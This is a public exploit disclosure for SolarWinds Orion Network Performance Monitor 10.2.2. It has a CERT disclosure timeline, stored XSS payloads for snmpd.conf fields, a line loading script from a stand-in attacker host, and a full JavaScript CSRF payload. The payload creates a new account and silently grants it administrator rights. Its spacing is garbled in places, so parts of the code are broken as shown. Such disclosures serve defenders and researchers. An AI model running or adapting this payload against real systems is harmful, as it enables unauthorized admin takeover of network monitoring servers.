/*
######################################################################################
# Exploit Title: SolarWinds Orion Network Performance Monitor 10.2.2 Multiple Vulnerabilities
# Date: Jul 21 2012
# Author: muts
# Version: SolarWinds Orion Network Performance Monitor 10.2.2
# Vendor URL: http://www.solarwinds.com/
######################################################################################
Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
02 Jul 2012: Contact received from SolarWinds with vulnerability confirmation and plans for remediation
09 Jul 2012: SolarWinds provides a preview release (10.3.1) for testing
10 Jul 2012: Advised SolarWinds that the preview release fixed the reported vulnerabilities
21 Jul 2012: Public disclosure
Vulnerability Details:
SolarWinds Orion Network Performance Monitor (NPM) is vulnerable to persistent XSS when scanning a remote system containing malicious JavaScript in its snmpd.conf file. The vulnerable fields were determined to be:
syslocation <script>alert('location')</script>
syscontact <script>alert('contact')</script>
sysName <script>alert('name')</script>
In addition, NPM is also vulnerable to CSRF attacks despite the fact that it makes use of VIEWSTATE protection.
Through a combination of XSS and CSRF, a user can be added to the web application by configuring the snmpd.conf file to point to an attacker-controlled JavaScript file:
syscontact <script src="http://attacker/evil.js"></script>
*/functiongetCookie(c_name){var i,x,y,ARRcookies=document.cookie.split(";");for(i=0;i<ARRcookies.length;i++){
x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
x=x.replace(/^\s+|\s+$/g,"");if(x==c_name){returnunescape(y);}}}functionsetCookie(c_name,value,exdays){var exdate=newDate();
exdate.setDate(exdate.getDate()+ exdays);var c_value=escape(value)+((exdays==null)?"":"; expires="+exdate.toUTCString());
document.cookie=c_name +"="+ c_value;}functionpostCredentials(viewState, user, password){var http =newXMLHttpRequest();var url ="/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion";var params ="ctl00%24ctl00%24ctl00%24BodyContent%24ScriptManagerPlaceHolder%24MasterScriptManager"+"="+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24UpdatePanel1%257Cctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1"+"&"+"__EVENTTARGET"+"="+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1"+"&"+"__EVENTARGUMENT"+"="+"&"+"__VIEWSTATE"+"="+encodeURIComponent(viewState)+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24UserName"+"="+ user +"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24Password"+"="+ password +"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24ConfirmPassword"+"="+ password +"&"+"__ASYNCPOST"+"="+"false"
http.open("POST", url,false);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection","close");
http.send(params);var response = http.responseText;var doc = document.implementation.createHTMLDocument('');
doc.documentElement.innerHTML = response;return(doc);}functionsetAdminPriv(viewState, username){var http =newXMLHttpRequest();var url ="/Orion/Admin/Accounts/EditAccount.aspx?AccountID="+ username +"&AccountType=Edit";var params ="__EVENTTARGET"+"="+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24submitButton"+"&"+"__EVENTARGUMENT"+"="+"&"+"__VIEWSTATE"+"="+encodeURIComponent(viewState)+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24checkboxesVisible"+"="+"hidden"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAccountEnabled%24listBox"+"="+"true"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24txtAccountExpires"+"="+"Never"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynDisableSessionTimeout%24listBox"+"="+"true"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAdminRights%24listBox"+"="+"true"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynAllowNodeManagement%24listBox"+"="+"true"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynCustomizeViews%24listBox"+"="+"true"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynClearEvents%24listBox"+"="+"true"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ynBrowserIntegration%24listBox"+"="+"true"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxAlertSound"+"="+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tbBreadcrumbItems"+"="+"50"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl00%241%24menuBars"+"="+"Default"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl01%243%24menuBars"+"="+"Network_TabMenu"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24tabBars%24tabBars%24ctl02%242%24menuBars"+"="+"Virtualization_TabMenu"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxHomePageView"+"="+"1"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxSummaryView"+"="+"1"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24lbxReportFolder"+"="+"%5CReports"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxNodeDetails"+"="+"-1"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVolumeDetails"+"="+"3"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl00%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxNodeDetails"+"="+"7"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24lbxInterfaceDetails"+"="+"14"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24lbxVSANDetails"+"="+"22"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl01%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24lbxUCSChassisDetails"+"="+"24"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl00%24ctl01%24ViewSelector%24lbxViewPicker"+"="+"9"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl01%24ctl01%24ViewSelector%24lbxViewPicker"+"="+"10"+"&"+"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24moduleSettings%24rptModules%24ctl02%24ctl00%24ctl08%24ctl00%24ctl02%24ctl01%24ViewSelector%24lbxViewPicker"+"="+"11"
http.open("POST", url,false);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection","close");
http.send(params);var response = http.responseText;var doc = document.implementation.createHTMLDocument('');
doc.documentElement.innerHTML = response;return(doc);}functiongetHtmlBody(url, ref){var xmlHttp =newXMLHttpRequest();
xmlHttp.open('GET', url,false);
xmlHttp.send(null);var results = xmlHttp.responseText;var doc = document.implementation.createHTMLDocument('');
doc.documentElement.innerHTML = results;return(doc);}functiongetViewState(doc){return(doc.getElementById("__VIEWSTATE"));}var username ="myuser";var password ="test";// Check if we already attacked the host to avoid duplicated attacksif(getCookie("o1")==null){// Get the initial view-statevar doc1 =getHtmlBody("/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion");// Create a new account with the given credentialspostCredentials(getViewState(doc1).value, username, password);// Get the edit account view-statevar doc2 =getHtmlBody("/Orion/Admin/Accounts/EditAccount.aspx?AccountID="+ username +"&AccountType=Edit");// Assign our new account with administrative privilegessetAdminPriv(getViewState(doc2).value, username);// Set the cookie to avoid duplicated attackssetCookie("o1",1,"");}